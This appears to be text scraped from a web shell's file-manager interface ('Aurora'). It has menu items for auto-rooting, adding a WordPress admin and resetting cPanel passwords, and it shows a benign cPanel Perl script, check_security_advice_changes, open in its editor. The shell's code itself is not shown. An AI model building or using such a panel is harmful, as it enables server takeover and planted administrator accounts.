Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
scripts
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: check_security_advice_changes
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - scripts/check_security_advice_changes Copyright 2022 cPanel L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited package scripts::check_security_advice_changes; use strict; use Cpanel::Transaction::File::JSON (); use Cpanel::Hash (); use Cpanel::Locale (); use Cpanel::Usage (); use Cpanel::Alarm (); use Capture::Tiny (); my $WANT_TYPE = 'mod_advice'; my $CHANNEL = 'securityadvisor'; our $HISTORY_FILE = '/var/cpanel/security_advisor_history.json'; _run_from_command_line(@ARGV) if !caller(); sub _run_from_command_line { my (@args) = @_; if ( grep { index( $_, '-background' ) > -1 } @args ) { @args = grep { index( $_, '-background' ) == -1 } @args; # CPANEL-41626: we want to keep elements of @args which DON'T match '-background', so we should check for equality to -1, not non-equality. require Cpanel::Daemonizer::Tiny; require Cpanel::FileUtils::Open; require Cpanel::ConfigFiles; my $pid = Cpanel::Daemonizer::Tiny::run_as_daemon( sub { #### # The next two calls are unchecked because it cannot be captured when running as a daemon no warnings 'once'; Cpanel::FileUtils::Open::sysopen_with_real_perms( \*STDERR, $Cpanel::ConfigFiles::CPANEL_ROOT . '/logs/error_log', 'O_WRONLY|O_APPEND|O_CREAT', 0600 ); open( STDOUT, '>&', \*STDERR ) || warn "Failed to redirect STDOUT to STDERR"; return _exit( __PACKAGE__->script( \@args ) ); } ); return _exit(0); } return _exit( __PACKAGE__->script( \@args ) ); } sub _exit { my ($code) = @_; return exit($code); } sub script { my ( $class, $argv ) = @_; my %opts = ( notify => 0, quiet => 0, ); my $self = bless {}, $class; Cpanel::Usage::wrap_options( $argv, sub { my (@args) = @_; $self->usage(@args); }, { 'notify' => \$opts{'notify'}, 'quiet' => \$opts{'quiet'} }, ); $self->{'notify'} = $opts{'notify'}; $self->{'quiet'} = $opts{'quiet'}; local $Cpanel::Locale::Context::DEFAULT_OUTPUT_CONTEXT = 'html'; # Make sure Cpanel::Locale->get_handle() is invoked before being invoked # by the security advisor modules; otherwise Net::SMTP will throw warnings. $self->_locale(); # The yum calls can take a while if yum is in use so we now # wait up to 30m. Since v78+ does the security advisor # checks in the background this should be ok now. my $main_alarm = Cpanel::Alarm->new( 1800, sub { die "$0 timed out because it was running for longer than 30 minutes."; } ); #max 30m my $trans_obj = Cpanel::Transaction::File::JSON->new( 'path' => $HISTORY_FILE ); my $previous_run = $trans_obj->get_data(); my %prev_hashes = ( ref $previous_run eq 'HASH' and $previous_run->{'hashes'} ) ? %{ $previous_run->{'hashes'} } : (); my %prev_message_keys = ( ref $previous_run eq 'HASH' and $previous_run->{'message_keys'} ) ? %{ $previous_run->{'message_keys'} } : (); my ( %hashes, %message_keys ); require Cpanel::Security::Advisor; require Cpanel::Security::AdvisorFetch; my $msgs = Cpanel::Security::AdvisorFetch::fetch_security_advice(); my $highest_notice_type = 0; my %notices; foreach my $data ( @{$msgs} ) { my $block = ( $data->{'advice'}{'block_notify'} ) ? $data->{'advice'}{'block_notify'} : 0; if ( $data->{'type'} eq $WANT_TYPE && !$block ) { my $module = $data->{'module'}; my $text = $data->{'advice'}{'text'} . ( $data->{'advice'}{'suggestion'} ? " " . $data->{'advice'}{'suggestion'} : '' ); my $hash = Cpanel::Hash::get_fastest_hash($text); my $message_key = ( $data->{'advice'}{'key'} ) ? $data->{'advice'}{'key'} : $data->{'module'}; # NOTE: Condition description: # NOTE: True If advice type is INFO/WARN/BAD && (advice not seen before (via static key or hash) or advise type is greater [i.e., worse] then seen type) my $good = Cpanel::Security::Advisor::_lookup_advise_type_by_value(q{ADVISE_GOOD}); if ( $data->{'advice'}{'type'} > $good && ( !( $prev_hashes{$hash} || $prev_message_keys{$message_key} ) || $prev_hashes{$hash} < $data->{'advice'}{'type'} ) ) { push @{ $notices{$module} }, $data->{'advice'}; if ( $highest_notice_type < $data->{'advice'}{'type'} ) { $highest_notice_type = $data->{'advice'}{'type'}; } } # maintain the augmented datastructure $hashes{$hash} = $data->{'advice'}{'type'}; # message key hash will store advise type as string $message_keys{$message_key}{$hash} = Cpanel::Security::Advisor::_lookup_advise_type( $data->{'advice'}{'type'} ); } } $trans_obj->set_data( { 'hashes' => \%hashes, 'message_keys' => \%message_keys } ); my ( $status, $statusmsg ) = $trans_obj->save_and_close(); # Need to notify { no warnings 'once'; if ( $highest_notice_type && # case CPANEL-6053: Only generate an iContact notification if there # are changes to WARN or higher. $highest_notice_type >= $Cpanel::Security::Advisor::ADVISE_WARN ) { $self->notify( $highest_notice_type, \%notices ); } else { print $self->_locale()->maketext("There are no changes to the Security Advisor state that require notification.") . "\n"; } } return 0; } sub usage { my ($self) = @_; print $self->_locale()->maketext(q{This tool monitors the state of the Security Advisor and can send a notification when the state changes.}), "\n\n"; print $self->_locale()->maketext( q{Usage: [_1][comment,a program name] ~[options~]}, $0 ), "\n\n"; print $self->_locale()->maketext(q{Options:}), "\n"; print "\t--help ", $self->_locale()->maketext(q{Display this help message.}), "\n"; print "\t--notify ", $self->_locale()->maketext(q{Send a notification to the system administrator.}), "\n"; print "\t--quiet ", $self->_locale()->maketext(q{Do not display output, and instead set the [output,asis,UNIX] exit code.}), "\n\n"; exit 0; } sub notify { my ( $self, $highest_notice_type, $notices ) = @_; require Cpanel::Locale; my $old = $self->_locale()->set_context_plain(); require Cpanel::Notify; my $ic_obj = Cpanel::Notify::notification_class( 'class' => 'Check::SecurityAdvisorStateChange', 'application' => 'Check::SecurityAdvisorStateChange', 'status' => 'changes', 'interval' => 1, 'constructor_args' => [ 'origin' => 'check_for_security_advise_changes', 'notices' => $notices, 'highest_notice_type' => $highest_notice_type, 'skip_send' => 1, ] ); unless ( $self->{'quiet'} ) { print $ic_obj->render_template_include_as_text( 'template' => 'subject', 'type' => 'text' ) . "\n\n" . $ic_obj->render_template_include_as_text( 'template' => 'body', 'type' => 'html' ); } if ( $self->{'notify'} ) { $ic_obj->send(); } $self->_locale()->set_context($old); return 1; } sub _locale { my ($self) = @_; require Cpanel::Locale; return ( $self->{'_locale'} ||= Cpanel::Locale->get_handle() ); } 1;